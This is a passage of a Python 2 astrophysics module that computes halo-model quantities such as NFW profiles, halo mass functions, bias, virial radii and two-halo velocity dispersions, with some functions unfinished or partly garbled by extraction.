CosPar)/cosmo.Omega_M_z(z,CosPar), 1./3.)*(1.+z), pow(3.*Mhalo2/4./np.pi/cosmo.rho_critical(z, CosPar)/cosmo.Omega_M_z(z,CosPar), 1./3.)*(1.+z), z, CosPar) # Physical to Comoving radius nu_f_nu = lambda nu: 0.129*np.sqrt(nu/np.sqrt(2.))*(1.+pow(nu/np.sqrt(2.), -0.3))*np.exp(-nu/np.sqrt(2.)/2.) # Sheth & Tormen 1999 nu=[delta_sc/D_growth/sigma_M]^2. 0.129 is for the whole integral, need to calculate the normalization again bias_nu = lambda nu, d_sc: 1.+nu/np.sqrt(2.)/d_sc+0.35*pow(nu/np.sqrt(2.), 1.-0.8)/d_sc-pow(nu/np.sqrt(2.), 0.8)/(pow(nu/np.sqrt(2.), 0.8)+0.35*(1.-0.8)*(1.-0.8/2.))/d_sc*np.sqrt(np.sqrt(2.)) # Tinker+2005 bias_nu_st = lambda nu, d_sc: 1.+(0.73*nu-1.)/d_sc+2.*0.15/d_sc/(1.+pow(0.73*nu, 0.15)) # Sheth & Tormen 1999 f_sigma = lambda sigma_M: 0.186*(1.+pow(sigma_M/2.57, -1.47))*np.exp(-1.19/sigma_M**2) # Tinker+2008, Delta=200 f_Legendre = lambda z, CosPar: cosmo.Omega_M_z(z, CosPar)**0.55 #Mhalo_star: This has to be tabulated for different cosmology parameters. Calculate it on the fly takes too much time. (Compute_Mhalo_star(Cosmo)) M_star = 5.19E12 # MSun not h^-1 MSun # Even though it's vectorized, it requires a large amount of memory to have a 3-D array (1E4, 1E4, 1E4) def NFW_ukm_integrand(logR, k, Mhalo, z, CosPar): """ NFW_ukm_integrand(logR, kk, Mhalo, z, CosPar) """ R_vir = virial_radius(Mhalo, z, CosPar) RR = R_vir*(np.exp(logR)).reshape(logR.shape[0], logR.size/logR.shape[0]) rhoR = NFW_profile(RR, Mhalo, z, CosPar) # rhoR(RR,Mhalo) RR_tmp = np.ones(Mhalo.size)*RR kR = RR_tmp*k.reshape(k.size, 1, 1) # kR(k, RR, Mhalo) WRK = np.sin(kR)/kR # (k, RR, Mhalo) return 1E18*4.*np.pi*RR_tmp**3*WRK*rhoR def NFW_ukm(k, Mhalo, z, CosPar): """ NFW_ukm(k, Mhalo, z, CosPar): output ukm[k, Mhalo] """ k = np.array(k) Mhalo = np.array(Mhalo) R_min = 1E-4 # in R_vir in the integrand R_max = 1. dlogR = 1E-3 logR = np.arange(np.log(R_min)-2.*dlogR, np.log(R_max)+2.*dlogR, dlogR) nlogR = logR.size Integrand = NFW_ukm_integrand(logR, k, Mhalo, z, CosPar) # (k, RR, Mhalo) return np.sum((Integrand[:,2:,:]+Integrand[:,:nlogR-2,:]+4.*Integrand[:,1:nlogR-1,:])/6.*dlogR, axis=1)/Mhalo def ps_2h_gal_dm_integrand(logM, k, z, CosPar): """ ps_2h_gal_dm_integrand(logM, k, z, CosPar): """ MM = np.exp(logM) dn_dlogM = halo_mass_function(MM, z, CosPar) bM = bias(MM, z, CosPar) # This is because I don't have 1 TB RAM ukm = np.zeros((k.size, logM.size)) progressbar_width = 80 progressbar_interval = logM.size/progressbar_width+1 # setup progress bar sys.stdout.write("[%s]" % (" " * progressbar_width)) sys.stdout.flush() sys.stdout.write("\b" * (progressbar_width+1)) # return to start of line, after '[' # Note ukm is physical, but k is comoving for i in np.arange(logM.size): ukm[:,i] = (NFW_ukm(k*(1.+z), MM[i], z, CosPar)).reshape(k.size) if (i%progressbar_interval==0): sys.stdout.write("-") sys.stdout.flush() sys.stdout.write("\n") return dn_dlogM*bM*ukm*MM/cosmo.rho_critical(z, CosPar)/cosmo.Omega_M_z(z, CosPar) # No bias included def ps_2h_gal_dm(k, Mhalo, z, CosPar, doHalo=False): """ ps_2h_gal_dm(k, Mhalo, z, CosPar): return pk(k, Mhalo) """ k = np.array(k) bias_normalization = 1.08037 # The mean bias between 1E3 and 1E17 solar mass #bM = bias(Mhalo, z, CosPar) #print bM plk = ps.ps_linear(k, z, CosPar) if doHalo: # This needs to be changed for spatial exclusion and normalization -- so we keep Mhalo in the arguments M_min = 1E3 M_max = 1E17 dlogM = 1E-2 logM = np.arange(np.log(M_min)-2.*dlogM, np.log(M_max)+2.*dlogM, dlogM) nlogM = logM.size Integrand = ps_2h_gal_dm_integrand(logM, k, z, CosPar) return (plk*np.sum((Integrand[:,2:]+Integrand[:,:nlogM-2]+4.*Integrand[:,1:nlogM-1])/6.*dlogM, axis=1)).reshape(k.size, 1)/bias_normalization else: return plk.reshape(k.size, 1) def xi_from_pk_fbt(R, Pk_func, UseTable=False): """ xi_from_pk_fbt(R, Pk_func): Inverse Fourier Bessel Transform """ k_min = 1E-6 k_max = 1E4 dlogk = 1.E-2 kk = np.exp(np.arange(np.log(k_min)-2.*dlogk,np.log(k_max)+2.*dlogk,dlogk)) nlogk = kk.size pk = Pk_func(kk) # pk(kk, Mhalo) kR = kk.reshape(kk.size, 1, 1)*R.reshape(1, R.shape[0], R.shape[0]/R.size) # kR(k, RR, Mhalo) WRK = np.sin(kR)/kR Ifbt = kk.reshape(kk.size, 1, 1)**3/2./np.pi**2*pk.reshape(pk.shape[0], 1, pk.shape[1])*WRK return np.sum((Ifbt[2:,:,:]+Ifbt[:nlogk-2,:,:]+4.*Ifbt[1:nlogk-1,:,:])/6.*dlogk, axis=0) # No bias included: xiR = b(Mhalo)*xi_2h_gal_dm # R can be in shape of (R, Mhalo) or (R) def xi_2h_gal_dm(R, Mhalo, z, CosPar, doHalo=False): """ xi_2h_gal_dm(R, Mhalo, z, CosPar): """ Mhalo = np.array(Mhalo) Mhalo = Mhalo.reshape(Mhalo.size) R = np.ones(Mhalo.size)*R.reshape(R.shape[0], R.size/R.shape[0]) xiR = np.zeros((R.size, Mhalo.size)) # This is because I don't have 1TB memory for i in np.arange(Mhalo.size): Pk_func = lambda k: ps_2h_gal_dm(k, Mhalo[i], z, CosPar, doHalo=doHalo) xiR[:,i] = (xi_from_pk_fbt(R[:,i], Pk_func)).reshape(R.shape[0]) # bM = bias(Mhalo, z, CosPar) return xiR # Mhalo_star in when Sigma = delta_sc def Mhalo_star(z, CosPar): M_min = 1E8 M_max = 1E17 dlogM = 1E-2 logM = np.arange(np.log(M_min), np.log(M_max)+2.*dlogM, dlogM) MM = np.exp(logM) sigma_M = np.sqrt(sigma_M_sqr(MM, 0, CosPar)) # at z=0 dsc = delta_sc(z, CosPar) f = interpolate.interp1d(sigma_M[::-1], MM[::-1]) return f(dsc) # b(M) def bias(Mhalo0, z, CosPar): Mhalo = np.array(Mhalo0) print "IF YOU SEE ME TOO MANY TIMES, YOU SHOULD VECTORIZE YOUR CODE. MAYBE YOU SHOULD VECTORIZE ME!" M_min = 1E3 M_max = 1E17 #if min(Mhalo)M_max: raise ValueError("halo mass too large") dlogM = 1E-2 logM = np.arange(np.log(M_min)-2.*dlogM, np.log(M_max)+2.*dlogM, dlogM) MM = np.exp(logM) sigma_M2 = sigma_M_sqr(MM, 0, CosPar) # at z=0 dsc = delta_sc(z, CosPar) nuM = dsc**2/sigma_M2/(cosmo.D_growth(z,CosPar)/cosmo.D_growth(0,CosPar))**2 bM = bias_nu(nuM, dsc) f = interpolate.interp1d(MM, bM) return f(Mhalo) # dN/dlogM def halo_mass_function(Mhalo, z, CosPar): print "IF YOU SEE ME TOO MANY TIMES, YOU SHOULD VECTORIZE YOUR CODE. MAYBE YOU SHOULD VECTORIZE ME!" M_min = 1E3 M_max = 1E17 dlogM = 1E-2 logM = np.arange(np.log(M_min)-2.*dlogM, np.log(M_max)+2.*dlogM, dlogM) nlogM = logM.size MM = np.exp(logM) sigma_M2 = sigma_M_sqr(MM, 0, CosPar) # at z=0 dsc = delta_sc(z, CosPar) nuM = dsc**2/sigma_M2/(cosmo.D_growth(z,CosPar)/cosmo.D_growth(0,CosPar))**2 #print min(nuM), max(nuM) dlognuM = np.zeros(nlogM) dlognuM[1:] = np.log(nuM[1:]/nuM[:nlogM-1]) dlognuM[0] = dlognuM[1] fM = nu_f_nu(nuM) nmz = fM*cosmo.rho_critical(z, CosPar)*cosmo.Omega_M_z(z, CosPar)/MM*dlognuM/dlogM Inte = fM*dlognuM normalization = np.sum(Inte[2:]+Inte[:nlogM-2]+4.*Inte[1:nlogM-1])/6. #print normalization f = interpolate.interp1d(MM, nmz) return f(Mhalo)/normalization def Delta_virial(z, CosPar): """ Delta_virial(z, CosPar): Bryan & Norman 1998. See also Weinberg & Kamionkowski 2003 """ #x = cosmo.Omega_M_z(z, CosPar)*(1.+z)**3/(cosmo.Omega_M_z(z,CosPar)*(1.+z)**3+cosmo.Omega_L_z(z,CosPar)) x = cosmo.Omega_M_z(z, CosPar)-1. return (18*np.pi*np.pi+82.*x-39.*x*x)/(1.+x) # Is this comoving or physical?: Physical def virial_radius(Mhalo, z, CosPar): """ virial_radius(Mhalo, z, CosPar): physical virial radius, multiply it by 1.+z to get comoving radius """ factor = 3./4./np.pi/cosmo.rho_critical(z, CosPar)/cosmo.Omega_M_z(z,CosPar)/Delta_virial(z, CosPar) return (factor*Mhalo)**(1./3.) # Bullock 2001 approximation virial_radius_jb01 = lambda Mhalo, z, CosPar: pow(Mhalo/1E11*CosPar['h']*200./CosPar['Omega_M']/Delta_virial(z, CosPar), 1./3.)*75./(1.+z)/CosPar['h'] def rho_s(c, z, CosPar, alpha=1.): """ rho_s(c, z, CosPar, alpha=1.) """ if (alpha<3. and alpha>0.): if (alpha==1.): factor=(np.log(1.+c)-c/(1.+c)) else: factor = c**(3.-alpha)/(3.-alpha)*hyp2f1(3.-alpha, 3.-alpha, 4.-alpha, -c) else: raise ValueError("alpha has to be in the set (0,3)") return cosmo.rho_critical(z,CosPar)*cosmo.Omega_M_z(z, CosPar)*Delta_virial(z, CosPar)*c**3/3./factor # NFW profile, allowing concentration to be fcorr*c and the slope to be alpha # r in ascending order # rho(r, Mhalo) def NFW_profile(R, Mhalo, z, CosPar, fcorr=1., alpha=1.): """ NFW_profile(R, Mhalo, z, CosPar, fcorr=1., alpha=1.) return rho(R), R in Mpc, rho in MSun pc^-2 """ R = np.array(R) # r could be r(r) or r(r, Mhalo) R = R.reshape(R.shape[0], R.size/R.shape[0]) Mhalo = np.array(Mhalo) c = fcorr*concentration(Mhalo, z, M_star) R_vir = virial_radius(Mhalo, z, CosPar) rhos = rho_s(c,z,CosPar,alpha) x = c*R/R_vir # cr/rvir(R, Mhalo) rsqrrho = pow(x, -alpha)*pow(1.0+x, alpha-3.0) return rhos*rsqrrho/1E18 # 1E18 Mpc -> pc # y can be y(ny,1) or y(ny, nMhalo) def NFW_project_profile(y, Mhalo, z, CosPar, fcorr=1., alpha=1.): """ NFW_project_profile(y0, Mhalo, z, CosPar, fcorr=1., alpha=1.) """ # Need to do some argumente/keyword checking R_min = 1E-5 R_max = 2E3 if min(y)R_max: raise ValueError("y too large") y = np.array(y) y = y.reshape(y.shape[0], y.size/y.shape[0]) # Convert it to y(ny,1) or y(ny,nMhalo) ny = y.shape[0] Mhalo = np.array(Mhalo) nMhalo = Mhalo.size yy = np.ones(nMhalo)*y.reshape(ny,1) # Set up interpolation profiles dlogR = 1E-2 R = np.exp(np.arange(np.log(R_min)-2.*dlogR, np.log(R_max)+2.*dlogR, dlogR)) nR = R.shape[0] R = np.ones(nMhalo)*R.reshape(nR, 1) # R(nR, nMhalo) rhoR = NFW_profile(R, Mhalo, z, CosPar, fcorr, alpha) # rhoR(nR, nMhalo) Rout = 6. Rvir = virial_radius(Mhalo, z, CosPar).reshape(nMhalo) # Rvir(nMhalo) Sigma_y = np.zeros((ny, nMhalo)) # Initialize output: Sigma_y(ny, nMhalo) # Very difficult to vectorize without approximation # Let's settle for what we have now dlogs = 1E-3 # 10% better than 1E-2 for i in np.arange(nMhalo): f = interpolate.interp1d(R[:,i], rhoR[:,i]) Sigma_integrand = lambda R, s: 2.*f(R)*R**2/np.sqrt(R*R-s*s) # dlogR s_max = max(Rvir[i]*Rout, max(yy[:,i])*1.2) s_min = yy[:,i] for j in np.arange(ny): ss = np.exp(np.arange(np.log(s_min[j])+dlogs,np.log(s_max)+dlogs,dlogs)) nlogs = ss.size Integrand = Sigma_integrand(ss, s_min[j]) Sigma_y[j, i] = np.sum((Integrand[2:]+Integrand[:nlogs-2]+4.*Integrand[1:nlogs-1])/6.*dlogs)*1E6 return Sigma_y # This piece of code is not finished yet def NFW_average_project_density(y0, Mhalo, z, CosPar, fcorr=1., alpha=1.): """ NFW_average_project_density(y0, Mhalo, z, CosPar, fcorr=1., alpha=1.) """ y = np.array(y0) c = fcorr*concentration(Mhalo, z, M_star) rvir = virial_radius(Mhalo, z, CosPar) ymin = rvir/c*1E-4 ymax = max(y) dlogy = 1E-2 ytmp = np.arange(np.log(ymin)-2.*dlogy, np.log(ymax)+2.*dlogy, dlogy) ytmp = np.exp(ytmp) if (ytmp.size <= 1): raise ValueError("The radius array is unrealistic.") #print "Integration Steps: ", ytmp.size #print "Computing projected density:" projected_density = NFW_project_profile_novector(ytmp, Mhalo, z, CosPar, fcorr, alpha) #print "Done computing projected density Done" #print "Computing average density:" total_mass = np.zeros(ytmp.size) total_mass[0] = projected_density[0]*np.pi*ymin*ymin #trapezoidal integration for i in np.arange(ytmp.size-1)+1: total_mass[i] = total_mass[i-1]+(projected_density[i]*ytmp[i]+projected_density[i-1]*ytmp[i-1])*(ytmp[i]-ytmp[i-1])*np.pi # average_density[i] = total_mass[i]/np.pi/ytmp[i]/ytmp[i] # Needs testing average_density = total_mass/np.pi/ytmp**2 #intepolation f = interpolate.interp1d(ytmp, average_density) return f(y) def NFW_profile_novector(R, Mhalo, z, CosPar, fcorr=1., alpha=1.): """ NFW_profile(R, Mhalo, z, CosPar, fcorr=1., alpha=1.) return rho(R), R in Mpc, rho in MSun pc^-2 """ c = fcorr*concentration(Mhalo, z, M_star) R_vir = virial_radius(Mhalo, z, CosPar) rhos = rho_s(c,z,CosPar,alpha) x = c*R/R_vir # cr/rvir(R, Mhalo) rsqrrho = pow(x, -alpha)*pow(1.0+x, alpha-3.0) return rhos*rsqrrho/1E18 # 1E18 Mpc -> pc # Projected NFW profile, Abel's tranform. *MUST* be vectorized! def NFW_project_integrand_novector(r, s, Mhalo, z, CosPar, fcorr=1., alpha=1.): return 2.*NFW_profile_novector(r, Mhalo, z, CosPar, fcorr, alpha)*r/np.sqrt(r*r-s*s)*1E6 # Can/Should use interpolation to speed up (see average_project_density below) *MUST* be vectorized! def NFW_project_profile_novector(y0, Mhalo, z, CosPar, fcorr=1., alpha=1.): """ NFW_project_profile_novector(y0, Mhalo, z, CosPar, fcorr=1., alpha=1.) """ rout = 5. y = np.array(y0) rvir = virial_radius(Mhalo, z, CosPar) ymax = max(max(y)*1.1, rvir*rout) # For each y, call NFW_profile once, can we just call NFW_profile once and be done with it? NFW_func = np.vectorize(lambda y, Mhalo, z, CosPar, fcorr, alpha: integrate.quad(NFW_project_integrand_novector, y*1.001, ymax, limit=1000, args=(y, Mhalo, z, CosPar, fcorr, alpha))) NFW_proj, err = NFW_func(y, Mhalo, z, CosPar, fcorr, alpha) return NFW_proj # Bottleneck, NFW_project_profile *MUST* be vectorized def NFW_average_project_density_novector(y0, Mhalo, z, CosPar, fcorr=1., alpha=1.): """ NFW_average_project_density_novector(y0, Mhalo, z, CosPar, fcorr=1., alpha=1.) """ y = np.array(y0) c = fcorr*concentration(Mhalo, z, M_star) rvir = virial_radius(Mhalo, z, CosPar) ymin = rvir/c*1E-4 ymax = max(y) dlogy = 1E-2 ytmp = np.arange(np.log(ymin)-2.*dlogy, np.log(ymax)+2.*dlogy, dlogy) ytmp = np.exp(ytmp) if (ytmp.size <= 1): raise ValueError("The radius array is unrealistic.") #print "Integration Steps: ", ytmp.size #print "Computing projected density:" projected_density = NFW_project_profile_novector(ytmp, Mhalo, z, CosPar, fcorr, alpha) #print "Done computing projected density Done" #print "Computing average density:" total_mass = np.zeros(ytmp.size) total_mass[0] = projected_density[0]*np.pi*ymin*ymin #trapezoidal integration for i in np.arange(ytmp.size-1)+1: total_mass[i] = total_mass[i-1]+(projected_density[i]*ytmp[i]+projected_density[i-1]*ytmp[i-1])*(ytmp[i]-ytmp[i-1])*np.pi # average_density[i] = total_mass[i]/np.pi/ytmp[i]/ytmp[i] # Needs testing average_density = total_mass/np.pi/ytmp**2 #intepolation f = interpolate.interp1d(ytmp, average_density) return f(y) # One dimensional virial motion? def NFW_approx_sigma_virial(Mhalo, z, CosPar, fcorr=1., alpha=1.): fsigma = 0.9 corr = (cosmo.Hubble_z(z, CosPar)**2*Delta_virial(z,CosPar)) return 476.*fsigma*pow(Mhalo/1E15, 1/3.)*pow(corr, 1./6.) def NFW_approx_sigma_halo(Mhalo, z, CosPar, fcorr=1., alpha=1.): sigma_fit = 400. R_fit = 50. #R_scale = virial_radius(Mhalo, z, CosPar) R_scale = pow(3.*Mhalo/4./np.pi/cosmo.rho_critical(z, CosPar)/cosmo.Omega_M_z(z,CosPar), 1./3.)*(1.+z) #print R_scale eta = 0.85 return sigma_fit/(1.+pow(R_scale/R_fit, eta)) def NFW_sigma_halo(Mhalo, z, CosPar, fcorr=1., alpha=1.): return np.sqrt(sigma_j_M_sqr(-1, Mhalo, z, CosPar))*CosPar['h']*100*f_Legendre(0., CosPar)*np.sqrt(1.-sigma_j_M_sqr(0, Mhalo, z, CosPar)**2/sigma_j_M_sqr(1,Mhalo,z,CosPar)/sigma_j_M_sqr(-1,Mhalo,z,CosPar)) # velocity anisotropy: beta = 0.5 (radial velocity dispersion) def NFW_sigma(R, Mhalo, z, CosPar, fcorr=1., alpha=1.): """ NFW_sigma(R, Mhalo, z, CosPar, fcorr=1., alpha=1.) return rho(R), R in Mpc, rho in MSun pc^-2 """ R = np.array(R) # r could be r(r) or r(r, Mhalo) R = R.reshape(R.shape[0], R.size/R.shape[0]) Mhalo = np.array(Mhalo) c = fcorr*concentration(Mhalo, z, M_star) R_vir = virial_radius(Mhalo, z, CosPar) rhos = rho_s(c,z,CosPar,alpha) x = c*R/R_vir # cr/rvir(R, Mhalo) gc = 1./(np.log(1.+c)-c/(1.+c)) return circular_virial(Mhalo,z,CosPar)*(1.+x)*np.sqrt(0.5*x*c*gc*(np.pi**2-np.log(x)-1./x-1./(1.+x)**2-6./(1.+x)+(1.+1./x/x-4./x-2./(1.+x))*np.log(1.+x)+3.*pow(np.log(1.+x),2)+6.*spence(1.+x))) #return circular_virial(Mhalo,z,CosPar)*(1.+x)*np.sqrt(c*gc*(-np.pi**2/3.+1./2./(1.+x)**2+2./(1.+x)+np.log(1.+x)/x+np.log(1.+x)/(1.+x)-pow(np.log(1.+x),2)-2.*spence(1.+x))) #return circular_virial(Mhalo,z,CosPar)*(1.+x)*np.sqrt(c*gc/x*(np.pi**2/6.-1./2./(1.+x)**2-1./(1.+x)-np.log(1.+x)/(1.+x)+pow(np.log(1.+x),2)/2.+spence(1.+x))) def NFW_project_sigma(y, Mhalo, z, CosPar, fcorr=1., alpha=1.): """ NFW_project_sigma(y0, Mhalo, z, CosPar, fcorr=1., alpha=1.) """ # Need to do some argumente/keyword checking bbeta = 0.0 R_min = 1E-5 R_max = 2E3 if min(y)R_max: raise ValueError("y too large") y = np.array(y) y = y.reshape(y.shape[0], y.size/y.shape[0]) # Convert it to y(ny,1) or y(ny,nMhalo) ny = y.shape[0] Mhalo = np.array(Mhalo) nMhalo = Mhalo.size yy = np.ones(nMhalo)*y.reshape(ny,1) # Set up interpolation profiles dlogR = 1E-2 R = np.exp(np.arange(np.log(R_min)-2.*dlogR, np.log(R_max)+2.*dlogR, dlogR)) nR = R.shape[0] R = np.ones(nMhalo)*R.reshape(nR, 1) # R(nR, nMhalo) rhoR = NFW_profile(R, Mhalo, z, CosPar, fcorr, alpha)*NFW_sigma(R, Mhalo, z, CosPar, fcorr, alpha)**2 # sigma^2*rhoR(nR, nMhalo) Rout = 5. Rvir = virial_radius(Mhalo, z, CosPar).reshape(nMhalo) # Rvir(nMhalo) Sigma_y = np.zeros((ny, nMhalo)) # Initialize output: Sigma_y(ny, nMhalo) # Very difficult to vectorize without approximation # Let's settle for what we have now dlogs = 1E-3 # 10% better than 1E-2 for i in np.arange(nMhalo): f = interpolate.interp1d(R[:,i], rhoR[:,i]) Sigma_integrand = lambda R, s: (1.-bbeta*s*s/R/R)*2.*f(R)*R**2/np.sqrt(R*R-s*s) # dlogR s_max = max(Rvir[i]*Rout, max(yy[:,i])*1.1) s_min = yy[:,i] for j in np.arange(ny): ss = np.exp(np.arange(np.log(s_min[j])+dlogs,np.log(s_max)+dlogs,dlogs)) nlogs = ss.size Integrand = Sigma_integrand(ss, s_min[j]) Sigma_y[j, i] = np.sum((Integrand[2:]+Integrand[:nlogs-2]+4.*Integrand[1:nlogs-1])/6.*dlogs)*1E6 Norm_Sigma_y = NFW_project_profile(y, Mhalo, z, CosPar, fcorr, alpha) return np.sqrt(Sigma_y/Norm_Sigma_y) # Premier for 2-halo term velocity correlation # Only vectorize in R2 #def sigma_j_R1_R2_integrand_unnorm(j, logk, R1, R2, z, CosPar): # kk = np.exp(logk) # Tk = kk**(3+2.*j)*ps.EH_TF_mpc(kk, z, CosPar) #/2./np.pi**2*(3E5/70.)**(3.95)*(1.95E-5*pow(0.27, -0.785-0.05*np.log(0.27))*np.exp(-1.14))**2 # kR1 = kk*(np.ones(R2.size)*R1.reshape(R1.size, 1)).reshape(R1.size, R2.size, 1) #Be careful with the broadcasting rules # kR2 = kk*(np.ones(R1.size)*R2.reshape(1, R2.size)).reshape(R1.size, R2.size, 1) #Be careful with the broadcasting rules # # Top-hat window function # WRK1 = 3./kR1**3*(np.sin(kR1)-kR1*np.cos(kR1)) # WRK2 = 3./kR2**3*(np.sin(kR2)-kR2*np.cos(kR2)) # return Tk*WRK1*WRK2 #def sigma_j_r_R1_R2_sqr_unnorm(j, r, R1, R2, z, CosPar): # """ # sigma_j_r_R1_R2_sqr_unnorm(j, r, R1, R2, z, CosPar): # """ # rr = np.array(r) # RR1 = np.array(R1) # RR2 = np.array(R2) # k_min = 1E-6 # k_max = 1E3 # dlogk = 1.E-2 # logk = np.arange(np.log(k_min),np.log(k_max)+2.*dlogk,dlogk) # nlogk = logk.size # # [nr, nR1, nR2, nk] # kr = np.exp(logk)*((rr.reshape(rr.size, 1)*np.ones(RR1.size)).reshape(rr.size, RR1.size, 1)*np.ones(RR2.size)).reshape(rr.size, RR1.size, RR2.size, 1) # KRK = (np.sin(kr)/kr)-(2./kr**3)*(np.sin(kr)-kr*np.cos(kr)) # Integrand = (sigma_j_R1_R2_integrand_unnorm(j, logk, RR1, RR2,z, CosPar)).reshape(1, RR1.size, RR2.size, nlogk)*KRK # # Compute the integral (Maybe a vectorized trapezoidal integral would be faster?) #print "Integrating..." # return np.sum((Integrand[:,1:]+Integrand[:,:nlogk-1])/2.*dlogk, axis=1) # return np.sum((Integrand[:,2:]+Integrand[:,:nlogk-2]+4.*Integrand[:,1:nlogk-1])/6.*dlogk, axis=1) def sigma_j_R1_R2_integrand_unnorm(j, logk, R1, R2, z, CosPar): kk = np.exp(logk) Tk = kk**(3+2.*j)*ps.EH_TF_mpc(kk, z, CosPar) #/2./np.pi**2*(3E5/70.)**(3.95)*(1.95E-5*pow(0.27, -0.785-0.05*np.log(0.27))*np.exp(-1.14))**2 kR1 = kk*R1 #Be careful with the broadcasting rules kR2 = kk*R2.reshape(R2.size, 1) #Be careful with the broadcasting rules # Top-hat window function WRK1 = (3./kR1**3*(np.sin(kR1)-kR1*np.cos(kR1))).reshape(1, kk.size) WRK2 = 3./kR2**3*(np.sin(kR2)-kR2*np.cos(kR2)) return Tk*WRK1*WRK2 def sigma_j_r_R1_R2_sqr_unnorm(j, r, R1, R2, z, CosPar, radial=False): """ sigma_j_r_R1_R2_sqr_unnorm(j, r, R1, R2, z, CosPar): """ rr = np.array(r) RR1 = np.array(R1) if RR1.size>1: raise ValueError("r and R1 should be scalar") RR2 = np.array(R2) k_min = 1E-6 k_max = 1E3 dlogk = 1.E-2 logk = np.arange(np.log(k_min),np.log(k_max)+2.*dlogk,dlogk) nlogk = logk.size # [nr, nR1, nR2, nk] kr = (np.exp(logk)).reshape(1, nlogk)*rr.reshape(rr.size, 1) if radial: KRK = (np.sin(kr)/kr)-(2./kr**3)*(np.sin(kr)-kr*np.cos(kr)) else: KRK = (np.sin(kr)/kr) # KRK = (1./kr**3)*(np.sin(kr)-kr*np.cos(kr)) Integrand = (sigma_j_R1_R2_integrand_unnorm(j, logk, R1, RR2, z, CosPar)).reshape(1, RR2.size, nlogk)*KRK.reshape(rr.size, 1, nlogk) # Compute the integral (Maybe a vectorized trapezoidal integral would be faster?) #print "Integrating..." # return np.sum((Integrand[:,1:]+Integrand[:,:nlogk-1])/2.*dlogk, axis=1) return np.sum((Integrand[:,:,2:]+Integrand[:,:,:nlogk-2]+4.*Integrand[:,:,1:nlogk-1])/6.*dlogk, axis=2) def sigma_j_r_R1_R2_sqr(j, r, R1, R2, z, CosPar, radial=False): srR12_sqr_unnormalized = sigma_j_r_R1_R2_sqr_unnorm(j, r, R1, R2, z, CosPar, radial=radial) s8_sqr = ps.sigma_R_sqr_unnorm(8./CosPar['h'], 0., CosPar) return srR12_sqr_unnormalized*CosPar['sigma_8']**2/s8_sqr # We only need to calculate it once ... def NFW_2h_sigma_nocorr(R0, Mhalo0, z, CosPar, mu=1., fcorr=1., alpha=1.): Mhalo = np.array(Mhalo0) nMhalo = Mhalo.size Mhalo = Mhalo.reshape(nMhalo) #if nMhalo>1: raise ValueError("Mhalo must be a scalar") R = np.array(R0) nR = R.size R = R.reshape(nR) RR = np.ones(nMhalo)*R.reshape(nR,1) sigma_halo = NFW_approx_sigma_halo(Mhalo, z, CosPar) bMhalo = bias(Mhalo, z, CosPar) # get \xi(R) no bias xiR = xi_2h_gal_dm(R, 1E13, z, CosPar) # Integration over all masses M_min = 1E3 M_max = 1E17 dlogM = 1E-2 logM = np.arange(np.log(M_min)-2.*dlogM, np.log(M_max)+2.*dlogM, dlogM) MM = np.exp(logM) dn_dlogM = halo_mass_function(MM, z, CosPar) bM = bias(MM, z, CosPar) nlogM = logM.size sigma_halo_MM = NFW_approx_sigma_halo(MM, z, CosPar) sigma_virial_MM = NFW_approx_sigma_virial(MM, z, CosPar)*np.sqrt(3.) # Use the approximation to speed things up Integrand = (dn_dlogM*bM*MM/cosmo.rho_critical(z, CosPar)/cosmo.Omega_M_z(z, CosPar)*(sigma_halo_MM**2+(mu*sigma_virial_MM)**2)).reshape(1,1,nlogM)*(1.+bMhalo.reshape(1, nMhalo, 1)*bM.reshape(1,1,nlogM)*xiR.reshape(nR, nMhalo, 1)) sigma2_average = np.sum((Integrand[:,:,2:]+Integrand[:,:,:nlogM-2]+4.*Integrand[:,:,1:nlogM-1])/6.*dlogM, axis=2)#.reshape(nR, nMhalo) return np.sqrt((sigma_halo**2).reshape(1, nMhalo)+sigma2_average/(1.+bMhalo.reshape(1,nMhalo)*xiR)) def NFW_2h_sigma_allmass(R0, Mhalo0, z, CosPar, mu=1., fcorr=1., alpha=1.): Mhalo = np.array(Mhalo0) nMhalo = Mhalo.size Mhalo = Mhalo.reshape(nMhalo) #if nMhalo>1: raise ValueError("Mhalo must be a scalar") R = np.array(R0) nR = R.size R = R.reshape(nR) RR = np.ones(nMhalo)*R.reshape(nR,1) sigma_halo = NFW_approx_sigma_halo(Mhalo, z, CosPar) bMhalo = bias(Mhalo, z, CosPar) # get \xi(R) no bias xiR = xi_2h_gal_dm(R, 1E13, z, CosPar) # This is impossible # Integration over all masses M_min = 1E3 M_max = 1E17 dlogM = 1E-2 logM = np.arange(np.log(M_min)-2.*dlogM, np.log(M_max)+2.*dlogM, dlogM) MM = np.exp(logM) dn_dlogM = halo_mass_function(MM, z, CosPar) bM = bias(MM, z, CosPar) nlogM = logM.size sigma_halo_MM = NFW_approx_sigma_halo(MM, z, CosPar) sigma_virial_MM = NFW_approx_sigma_virial(MM, z, CosPar)*np.sqrt(3.) # Use the approximation to speed things up sigma_correlation_sqr = np.zeros(nR*nMhalo*nlogM).reshape(nR, nMhalo, nlogM) sigma_Mhalo_corr = np.sqrt(1.-sigma_j_M_sqr(0, Mhalo, z, CosPar)**2/sigma_j_M_sqr(1,Mhalo,z,CosPar)/sigma_j_M_sqr(-1,Mhalo,z,CosPar)) sigma_MM_corr = np.sqrt(1.-sigma_j_M_sqr(0, MM, z, CosPar)**2/sigma_j_M_sqr(1,MM,z,CosPar)/sigma_j_M_sqr(-1,MM,z,CosPar)) prefix = (100.*CosPar['h']*f_Legendre(0,CosPar))**2 for j in np.arange(nMhalo): sigma_correlation_sqr[:,j,:] = sigma_j_r_M1_M2_sqr(-1, R, Mhalo[j], MM, z, CosPar)*prefix*sigma_Mhalo_corr[j]*sigma_MM_corr #for i in np.arange(nR): # sigma_correlation_sqr[i,j,:] = sigma_j_r_M1_M2_sqr(-1, R[i], Mhalo[j], MM, z, CosPar)*prefix*sigma_Mhalo_corr[j]*sigma_MM_corr # print np.median(np.sqrt(sigma_correlation_sqr)) # Integrand = (dn_dlogM*bM*MM/cosmo.rho_critical(z, CosPar)/cosmo.Omega_M_z(z, CosPar)*(sigma_halo_MM**2+(mu*sigma_virial_MM)**2)).reshape(1,1,nlogM)*(1.+bMhalo.reshape(1, nMhalo, 1)*bM.reshape(1,1,nlogM)*xiR.reshape(nR, nMhalo, 1)) Integrand = (dn_dlogM*bM*MM/cosmo.rho_critical(z, CosPar)/cosmo.Omega_M_z(z, CosPar)*((sigma_halo_MM**2+(mu*sigma_virial_MM)**2).reshape(1,1,nlogM)-2*sigma_correlation_sqr))*(1.+bMhalo.reshape(1, nMhalo, 1)*bM.reshape(1,1,nlogM)*xiR.reshape(nR, nMhalo, 